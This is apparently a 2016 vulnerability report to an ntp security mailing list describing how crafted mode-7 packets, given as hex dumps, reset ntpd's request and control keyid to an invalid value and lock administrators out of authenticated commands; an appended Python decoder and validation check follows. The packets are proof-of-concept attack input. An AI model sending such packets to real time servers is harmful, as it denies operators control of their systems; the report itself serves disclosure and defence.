[ntp:security] security report

连一汉 lianyihan at 360.cn
Mon Jan 11 03:50:59 UTC 2016


Hi, I'm Lian, a security researcher in Qihoo 360. I found a vulnerability on ntp_request.c perhaps.

================ target environment =================

ntp-4.2.8p5 and lower

================================================
Command "ntpdc -c trustedkey AAAA" can't be used now, but I can use these packets to simulate it.

Set_control_keyid:                                                 // command is: ntpdc -c trustedkey …
17 80 03 21 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 86 11 09 1E B8 52
00 00 00 08 71 AA 5D 1B 92 C6 C9 D8 CB 76 5D CB
F8 D2 87 D9 (These red bits are a wrong MD5 of the other bits; in order for decryption to succeed, you need to calculate it yourself.)

Set_request_keyid:                                                // command is: ntpdc -c requestkey …
17 80 03 20 00 01 00 08 41 41 41 41 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 DA 2B 62 43 5D 1E B8 52
00 00 00 08 FB D2 B8 32 EF 89 37 21 73 F2 20 B4
94 82 95 59

After I sent these packets, the global variable info_auth_keyid or ctl_auth_keyid will be assigned "41 41 41 41":

Ntp_request.c:

2268:  info_auth_keyid = ntohl(*pkeyid);
…
2296:  ctl_auth_keyid = ntohl(*pkeyid);

- Because key "41 41 41 41" isn't a valid key and does not exist in ntp.keys, all the trusted ntpd administrators couldn't use any of the ntpdc and ntpq commands which need authentication, even though they have the real key and password, until the ntpd service is restarted.

Here are the details:

authentication function :

Ntp_control.c:
Line_1158: !res_authokay || res_keyid != ctl_auth_keyid
Authkeys.c:
Line_690:  if (0 == keyno || !authhavekey(keyno) || size < 4)
                     …
Ntp_request.c:
Line 586:  ntohl(tailinpkt->keyid) != info_auth_keyid

- Here is the test screenshot:

Before I sent the attack packet, addpeer through ntpq commands succeeded.
But addpeer failed after I sent the attack packet.


And it's the same for ntpdc commands.


And perhaps this problem is not serious because of the password protection. But it's a security issue after all.

Best regards!
Thanks!
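As an added example, not part of Lian's report or of the ntp project's code: a decoder for the mode-7 request packets shown above, plus the check a server would need before accepting a new request/control keyid (nonzero, and present in the configured key file), which is exactly what lets the 0x41414141 value through. The request codes, field offsets and the REPORT_PKT bytes are reconstructed from ntp_request.h and the first dump; the trusted key set is a constructed assumption and the MAC is the report's own unverified value.

```python
import struct

# Layout of struct req_pkt and request codes (IMPL_XNTPD) as in ntpd's ntp_request.h.
MODE_PRIVATE    = 7
REQ_REQUEST_KEY = 0x20   # "ntpdc -c requestkey": sets info_auth_keyid
REQ_CONTROL_KEY = 0x21   # "ntpdc -c controlkey": sets ctl_auth_keyid
REQ_LEN_HDR     = 8      # rm_vn_mode, auth_seq, implementation, request, err_nitems, mbz_itemsize
REQ_DATA_LEN    = 176    # char data[MAXFILENAME + 48]

# First dump from the report, rebuilt (constructed): header, one 8-byte item carrying
# keyid 0x41414141, zero padding, 8-byte tstamp, authenticating keyid 8, 16-byte MD5 MAC.
REPORT_PKT = (bytes.fromhex("17800321 0001 0008 41414141 00000000")
              + b"\x00" * (REQ_DATA_LEN - 8)
              + bytes.fromhex("DA2B8611091EB852 00000008")
              + bytes.fromhex("71AA5D1B92C6C9D8CB765DCBF8D287D9"))

def parse_mode7_request(pkt):
    """Split a mode-7 request into header fields, item data and the auth trailer."""
    if len(pkt) < REQ_LEN_HDR + REQ_DATA_LEN:
        raise ValueError("packet shorter than a mode-7 request")
    rm_vn_mode, auth_seq, impl, req, err_nitems, mbz_itemsize = struct.unpack(
        "!BBBBHH", pkt[:REQ_LEN_HDR])
    if rm_vn_mode & 0x07 != MODE_PRIVATE:
        raise ValueError("not a mode-7 packet")
    nitems, itemsize = err_nitems & 0x0FFF, mbz_itemsize & 0x0FFF
    if nitems * itemsize > REQ_DATA_LEN:
        raise ValueError("nitems * itemsize exceeds the data area")
    data = pkt[REQ_LEN_HDR:REQ_LEN_HDR + REQ_DATA_LEN]
    items = [data[i * itemsize:(i + 1) * itemsize] for i in range(nitems)]
    trailer = pkt[REQ_LEN_HDR + REQ_DATA_LEN:]          # tstamp(8) | keyid(4) | mac
    auth_keyid = struct.unpack("!I", trailer[8:12])[0] if len(trailer) >= 12 else None
    return {"version": (rm_vn_mode >> 3) & 0x07, "response": bool(rm_vn_mode & 0x80),
            "authenticated": bool(auth_seq & 0x80), "implementation": impl,
            "request": req, "items": items, "auth_keyid": auth_keyid}

def check_keyid_change(pkt, trusted_keys):
    """Validation the report shows ntpd skipping: refuse a keyid that is 0 or not in the key file."""
    p = parse_mode7_request(pkt)
    if p["request"] not in (REQ_REQUEST_KEY, REQ_CONTROL_KEY):
        return "not a keyid change"
    if not p["items"] or len(p["items"][0]) < 4:
        return "reject: no keyid item"
    new_keyid = struct.unpack("!I", p["items"][0][:4])[0]
    if new_keyid == 0 or new_keyid not in trusted_keys:
        return "reject: keyid 0x%08x not in key file" % new_keyid
    return "ok: keyid %d" % new_keyid
```

Run against REPORT_PKT with a key set of {8} (the key the packet authenticates with), the check refuses the 0x41414141 keyid instead of storing it in ctl_auth_keyid; a MAC verifier would sit before this check in a real receive path.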

